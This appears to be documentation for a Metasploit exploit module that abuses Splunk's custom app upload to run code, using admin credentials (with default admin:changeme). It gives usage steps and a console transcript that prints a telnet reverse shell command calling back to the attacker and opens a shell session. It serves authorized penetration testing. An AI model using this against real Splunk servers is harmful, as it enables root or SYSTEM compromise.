metasploit-gs/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md

Vulnerable Application

This module exploits a feature of Splunk whereby a custom application can be uploaded through the web based interface. Through the script search command a user can call commands defined in their custom application which includes arbitrary perl or python code. To abuse this behavior, a valid Splunk user with the admin role is required. By default, this module uses the credential of "admin:changeme", the default Administrator credential for Splunk. Note that the Splunk web interface runs as SYSTEM on Windows, or as root on Linux by default. This module has been tested successfully against:

• 5.0 (Ubuntu 10.04, Windows XP and Windows Server 2003 SP2 with splunk-5.0.1-143156)
• 6.1, 6.1.1
• 7.2.4 (OSX 10.14.3, Windows 10 10.0.17134.1, CentOS7 3.10.0-957.1.3.el7.x86_64)

Verification Steps

1. Start msfconsole

2. Do: use exploit/multi/http/splunk_upload_app_exec

3. Set required variables (you will need admin credentials)

4. Do: SET LHOST [ip]

5. Do: SET RHOST [ip]

6. • If targeting linux or macos the payload cmd/unix/reverse_python will be automatically selected.
   • If targeting windows the payload cmd/windows/adduser will be automatically selected.

7. You should get either a reverse shell on port 4444 via the predefined handler (linux/osx) or a new user in case (windows target)

External Demo

• First PoC
  
• Metasploit module how-to
  
• SPLUNK API
  

Options

EnableOverwrite Overwrites an app of the same name. Needed if you change the app code in the tgz. Is not enabled by default.

Scenarios

Testing against 7.2.4 running on OSX

Given admin credentials we can upload the custom app to SPLUNK, which will provide us with a reverse shell, triggered by the 'search' field API.

msf5 exploit(multi/http/splunk_upload_app_exec) >
msf5 exploit(multi/http/splunk_upload_app_exec) > set RHOST 172.16.165.1
RHOST => 172.16.165.1
msf5 exploit(multi/http/splunk_upload_app_exec) > set password splunksplunk
password => splunksplunk
msf5 exploit(multi/http/splunk_upload_app_exec) > show targets

Exploit targets:

 Id  Name
 --  ----
 0   Automatic
 1   Splunk >= 7.2.4 / Linux
 2   Splunk >= 7.2.4 / Windows
 3   Splunk >= 7.2.4 / OSX
 4   Splunk >= 5.0.1 / Linux
 5   Splunk >= 5.0.1 / Windows


msf5 exploit(multi/http/splunk_upload_app_exec) > set target 3
target => 3
msf5 exploit(multi/http/splunk_upload_app_exec) > exploit

[*] Started reverse TCP double handler on 172.16.165.206:4444
[*] Using command: sh -c '(sleep 3733|telnet 172.16.165.206 4444|while : ; do sh && break; done 2>&1|telnet 172.16.165.206 4444 >/dev/null 2>&1 &)'
[*] Authenticating...
[*] Fetching state token from /en-US/manager/appinstall/_upload
[*] Uploading file upload_app_exec.tgz
[+] upload_app_exec successfully uploaded
[*] Invoking script command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 8kNbt70jYB3aJKPm;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\n8kNbt70jYB3aJKPm\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (172.16.165.206:4444 -> 172.16.165.1:51512) at 2019-03-17 22:12:33 +0100